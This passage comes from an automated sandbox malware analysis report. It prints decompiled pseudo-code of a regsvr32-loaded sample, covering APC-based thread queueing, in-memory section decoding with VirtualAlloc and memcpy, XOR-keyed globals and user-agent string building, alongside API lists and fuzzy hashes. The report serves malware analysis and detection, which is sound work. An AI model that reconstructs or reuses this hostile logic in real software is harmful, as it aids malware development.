                                                                                                                                                                                                                                    				_t13 = _t4;
                                                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                    						_t11 = GetLastError();
                                                                                                                                                                                                                                    						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                    						CloseHandle(_t13);
                                                                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                                                                    						SetLastError(_t11);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00000000,?,026D4118,026D1B6A), ref: 026D12F3
                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 026D1308
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 026D1313
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 026D131D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 026D1324
                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 026D132D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
• Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                    • Opcode ID: 810943e831b34168e1adf9c4f42dacf2e8e1690dc3f7a0557a28a67f489c8eb6
                                                                                                                                                                                                                                    • Instruction ID: 77ef0eee87f0245e4f14caf83862ded832b6232150651316f556cadc67724abf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 810943e831b34168e1adf9c4f42dacf2e8e1690dc3f7a0557a28a67f489c8eb6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F05E32D82268FBD7215BA0AC08F9EBB68FB09651F415844F605D1240C73088708FA6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

[Figure: control-flow graph of the function starting at 23e225b; node legend: Executed / Not Executed]
                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E023E225B(signed int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				CHAR* _v16;
                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				CHAR* _t22;
                                                                                                                                                                                                                                    				CHAR* _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                                                    				CHAR* _t42;
                                                                                                                                                                                                                                    				CHAR* _t43;
                                                                                                                                                                                                                                    				CHAR* _t44;
                                                                                                                                                                                                                                    				CHAR* _t46;
                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                                                    				signed char _t56;
                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                                                    				CHAR* _t66;
                                                                                                                                                                                                                                    				char* _t67;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t61 = __edx;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t21 = E023E550E();
                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                    					_t59 =  *0x23ed25c; // 0x4000000a
                                                                                                                                                                                                                                    					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    					 *0x23ed25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t22 =  *0x23ed164(0, 2);
                                                                                                                                                                                                                                    				_v16 = _t22;
                                                                                                                                                                                                                                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                    					_t25 = E023E3D0D( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                    					_t54 = _t25;
                                                                                                                                                                                                                                    					_t26 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					if( *0x23ed25c > 5) {
                                                                                                                                                                                                                                    						_t8 = _t26 + 0x23ee5cd; // 0x4d283a53
                                                                                                                                                                                                                                    						_t27 = _t8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t7 = _t26 + 0x23eea15; // 0x44283a44
                                                                                                                                                                                                                                    						_t27 = _t7;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E023E1BF4(_t27, _t27);
                                                                                                                                                                                                                                    					_t31 = E023E1B2F(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                    						CloseHandle(_v20);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t62 = 5;
                                                                                                                                                                                                                                    					if(_t54 != _t62) {
                                                                                                                                                                                                                                    						 *0x23ed270 =  *0x23ed270 ^ 0x81bbe65d;
                                                                                                                                                                                                                                    						_t32 = E023E2049(0x60);
                                                                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                                                                    						 *0x23ed32c = _t32;
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                                    							_t49 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    							_t68 = _t68 + 0xc;
                                                                                                                                                                                                                                    							__imp__(_t49 + 0x40);
                                                                                                                                                                                                                                    							_t51 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    							 *_t51 = 0x23ee836;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						_t54 = 0;
                                                                                                                                                                                                                                    						if(0 == 0) {
                                                                                                                                                                                                                                    							_t36 = RtlAllocateHeap( *0x23ed238, 0, 0x43);
                                                                                                                                                                                                                                    							__eflags = _t36;
                                                                                                                                                                                                                                    							 *0x23ed2c4 = _t36;
                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                    								_push(8);
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t56 =  *0x23ed25c; // 0x4000000a
                                                                                                                                                                                                                                    								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                                    								_t58 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    								_t13 = _t58 + 0x23ee55a; // 0x697a6f4d
                                                                                                                                                                                                                                    								_t55 = _t13;
                                                                                                                                                                                                                                    								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x23ec2a7);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							_t54 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								E023E269C( ~_v8 &  *0x23ed270, 0x23ed00c); // executed
                                                                                                                                                                                                                                    								_t42 = E023E4094(_t55); // executed
                                                                                                                                                                                                                                    								_t54 = _t42;
                                                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t43 = E023E96A4(_t55); // executed
                                                                                                                                                                                                                                    								__eflags = _t43;
                                                                                                                                                                                                                                    								if(_t43 != 0) {
                                                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                                                    									_t65 = _v12;
                                                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                    										_t44 = E023E6786(_t61, _t65, _v8); // executed
                                                                                                                                                                                                                                    										_t54 = _t44;
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags = _t65;
                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t46 = E023E3DD9(__eflags,  &(_t65[4])); // executed
                                                                                                                                                                                                                                    									_t54 = _t46;
                                                                                                                                                                                                                                    									__eflags = _t54;
                                                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t54 = 8;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t66 = _v12;
                                                                                                                                                                                                                                    						if(_t66 == 0) {
                                                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                                                    							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                    								 *0x23ed160();
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t67 =  &(_t66[4]);
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    						} while (E023EA501(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t54 = _t22;
                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                    					return _t54;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
































                                                                                                                                                                                                                                    0x023e23c0
                                                                                                                                                                                                                                    0x023e23c7
                                                                                                                                                                                                                                    0x023e23d4
                                                                                                                                                                                                                                    0x023e23d9
                                                                                                                                                                                                                                    0x023e23de
                                                                                                                                                                                                                                    0x023e23e0
                                                                                                                                                                                                                                    0x023e23e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e23e4
                                                                                                                                                                                                                                    0x023e23e9
                                                                                                                                                                                                                                    0x023e23eb
                                                                                                                                                                                                                                    0x023e23f2
                                                                                                                                                                                                                                    0x023e23f6
                                                                                                                                                                                                                                    0x023e23f9
                                                                                                                                                                                                                                    0x023e240e
                                                                                                                                                                                                                                    0x023e2412
                                                                                                                                                                                                                                    0x023e2417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e2417
                                                                                                                                                                                                                                    0x023e23fb
                                                                                                                                                                                                                                    0x023e23fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e2403
                                                                                                                                                                                                                                    0x023e2408
                                                                                                                                                                                                                                    0x023e240a
                                                                                                                                                                                                                                    0x023e240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e240c
                                                                                                                                                                                                                                    0x023e23ef
                                                                                                                                                                                                                                    0x023e23ef
                                                                                                                                                                                                                                    0x023e23c0
                                                                                                                                                                                                                                    0x023e22fe
                                                                                                                                                                                                                                    0x023e22fe
                                                                                                                                                                                                                                    0x023e2303
                                                                                                                                                                                                                                    0x023e2419
                                                                                                                                                                                                                                    0x023e241d
                                                                                                                                                                                                                                    0x023e2425
                                                                                                                                                                                                                                    0x023e2425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e241d
                                                                                                                                                                                                                                    0x023e2309
                                                                                                                                                                                                                                    0x023e230c
                                                                                                                                                                                                                                    0x023e2316
                                                                                                                                                                                                                                    0x023e231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e242d
                                                                                                                                                                                                                                    0x023e242d
                                                                                                                                                                                                                                    0x023e2431
                                                                                                                                                                                                                                    0x023e2435
                                                                                                                                                                                                                                    0x023e2435

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,023E2274,00000000,00000000), ref: 023E551D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 023E22F1
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E2340
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(04CC9570), ref: 023E2351
                                                                                                                                                                                                                                      • Part of subcall function 023E3DD9: memset.NTDLL ref: 023E3DEE
                                                                                                                                                                                                                                      • Part of subcall function 023E3DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 023E3E22
                                                                                                                                                                                                                                      • Part of subcall function 023E3DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 023E3E2D
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 023E237C
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E23AC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4246211962-0
                                                                                                                                                                                                                                    • Opcode ID: 480dbfdb47523c630cf3fa9ae513f23b106420f310a6110c52274d4d4be228a6
                                                                                                                                                                                                                                    • Instruction ID: 5ecf0f55d29b8a20047c6f38b31df3bf010db3cbb12c763d722e8285c2972b88
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 480dbfdb47523c630cf3fa9ae513f23b106420f310a6110c52274d4d4be228a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051ADB1F50239EBDF309AA59884B6F77ADAB08704F044826E903EB1C1E775D95C8F51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(80000002), ref: 023E3B46
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(023E1885), ref: 023E3B89
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E3B9D
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E3BAB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: 8d733f03bcf193a35792341abb933707153c256956e674b42e197a3f835ea975
                                                                                                                                                                                                                                    • Instruction ID: f799429fcd1d1fcfb8fd2ba0f3c1c69ca92bde4f6d55ec1b1d54fd473cf3f78e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d733f03bcf193a35792341abb933707153c256956e674b42e197a3f835ea975
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0931EAB190010AEF8F15DF98D4D48AE7BB9FF48354B10846EE50BA7290D7359689CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E026D18F4(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t77 =  *0x26d4130;
                                                                                                                                                                                                                                    				_t39 = E026D1F5D(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                                                                    							_t47 =  *0x26d414c;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                    							_t11 = _t66 + 0x26d51a7; // 0x26d51a7
                                                                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                                                                    								E026D18C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                                                                    								 *0x26d414c = _t47;
                                                                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,026D167D,00003000,00000004,?,?,026D167D,00000000), ref: 026D194A
                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,026D167D,?,?,026D167D,00000000), ref: 026D19DC
                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,026D167D,00000000), ref: 026D19F7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                    • String ID: Mar 9 2021
                                                                                                                                                                                                                                    • API String ID: 4010158826-2159264323
                                                                                                                                                                                                                                    • Opcode ID: 22e3ef7a5a46040d99616e1b16e9676fd38dc2f717e86dba6a8f49c383ffe6a0
                                                                                                                                                                                                                                    • Instruction ID: 5c2a213307180326b59964e517a649393ceb13995095ece011f5c6ef407d2850
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22e3ef7a5a46040d99616e1b16e9676fd38dc2f717e86dba6a8f49c383ffe6a0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE315071E0011DAFCB00CF99C881BAEBBB5BF49304F1481A9E509FB244D7B1AA56CF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                    			E023E1A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                    				int _t46;
                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                    				int _t48;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                    				_t46 = 0; // executed
                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                    					Sleep(0xc8);
                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v8 >= _t39) {
                                                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                                                    							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                    								_t46 = _t46 + 1;
                                                                                                                                                                                                                                    								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                    								_t39 = E023E2049(_t48);
                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_a4 = _t39;
                                                                                                                                                                                                                                    					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1198164300-0
                                                                                                                                                                                                                                    • Opcode ID: 145d6d8931a7da475e5188fb993c6a86c1cdb5fd8c25eaa3d0a2b0b0542ba6e2
                                                                                                                                                                                                                                    • Instruction ID: 99182f4c9f2cdef6ac06aa9072ee4512a0d2b58c2db0e994d6032f8e0ba2df98
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 145d6d8931a7da475e5188fb993c6a86c1cdb5fd8c25eaa3d0a2b0b0542ba6e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C213075A00219EFCF10DFA8D884ADEBBB9FF49315B1045A9E94AE7250E730DE48CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E023E94A9(char* __eax) {
                                                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				char* _t21;
                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                    				char* _t24;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t21 = __eax;
